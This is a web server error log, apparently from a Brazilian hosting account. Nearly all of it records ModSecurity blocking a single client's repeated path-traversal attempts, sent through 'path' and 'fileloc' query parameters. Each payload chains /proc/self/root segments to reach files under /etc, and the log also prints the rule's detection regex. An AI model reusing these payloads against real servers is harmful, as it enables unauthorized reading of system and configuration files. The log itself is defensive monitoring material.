[Tue Mar 17 08:16:01.623512 2026] [access_compat:error] [pid 1210:tid 140411658000128] [client 185.77.220.68:11793] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 08:16:23.460128 2026] [:error] [pid 11469:tid 140411733534464] [client 74.7.241.46:58176] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4B5DEJR9VXonE_-1EvAAAAQE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:16:26.148496 2026] [:error] [pid 1961:tid 140411683178240] [client 74.7.241.46:49994] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4CHRXaaWotPICgYsbsQAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:16:28.505121 2026] [:error] [pid 6002:tid 140411699963648] [client 74.7.241.46:49998] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4C_AKZeKGvQeoFhlCjgAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:16:30.091928 2026] [:error] [pid 7437:tid 140411599251200] [client 74.7.241.46:60904] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4DgeiSKl8TjouI-b6EAAAA9E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:16:31.483528 2026] [:error] [pid 11469:tid 140411540502272] [client 74.7.241.46:60920] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4D5DEJR9VXonE_-1EwAAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:16:33.916655 2026] [:error] [pid 32588:tid 140411574073088] [client 74.7.241.46:60924] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4ES8PwvOE6ZaeZxiFyQAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:16:35.351234 2026] [:error] [pid 4712:tid 140411632822016] [client 74.7.241.46:60940] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4E3QLOys_ArAUsGMI-wAAAc0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:16:37.264938 2026] [:error] [pid 1016:tid 140411708356352] [client 74.7.241.46:60942] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4FJqmL8PQht4WJFlALQAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:16:38.609394 2026] [:error] [pid 11293:tid 140411565680384] [client 74.7.241.46:59902] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4FtCmCSWTlPouqorCywAAANU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:16:39.927013 2026] [:error] [pid 11293:tid 140411565680384] [client 74.7.241.46:59916] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4F9CmCSWTlPouqorC0AAAANU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:16:41.488326 2026] [:error] [pid 2305:tid 140411666392832] [client 74.7.241.46:59922] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4GQQohV2v-7oj5HHyDQAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:16:42.910939 2026] [:error] [pid 11469:tid 140411616036608] [client 74.7.241.46:59926] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4GpDEJR9VXonE_-1ExAAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:16:44.727276 2026] [:error] [pid 1517:tid 140411741927168] [client 74.7.241.46:59936] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4HGHuKRvkhJseepPaZQAAAwA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:16:46.125055 2026] [:error] [pid 7000:tid 140411674785536] [client 74.7.241.46:59942] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4HhePVOt35XCGZP8lSQAAA4g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:16:47.475292 2026] [:error] [pid 7437:tid 140411548894976] [client 74.7.241.46:59946] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4HweiSKl8TjouI-b6GQAAA9c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:16:48.931469 2026] [:error] [pid 1961:tid 140411641214720] [client 74.7.241.46:38624] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4IHRXaaWotPICgYsbvgAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:16:50.237998 2026] [:error] [pid 7000:tid 140411733534464] [client 74.7.241.46:38628] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4IhePVOt35XCGZP8lTQAAA4E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:16:51.490315 2026] [:error] [pid 1016:tid 140411691570944] [client 74.7.241.46:38636] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4I5qmL8PQht4WJFlAOQAAAUY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:16:54.212310 2026] [:error] [pid 11293:tid 140411590858496] [client 74.7.241.46:38642] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4JNCmCSWTlPouqorC2gAAANI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:16:55.701600 2026] [:error] [pid 662:tid 140411632822016] [client 74.7.241.46:38644] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4J660egQjobaJUYgHJwAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:16:58.246646 2026] [:error] [pid 6002:tid 140411624429312] [client 74.7.241.46:38654] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4KvAKZeKGvQeoFhlCnQAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
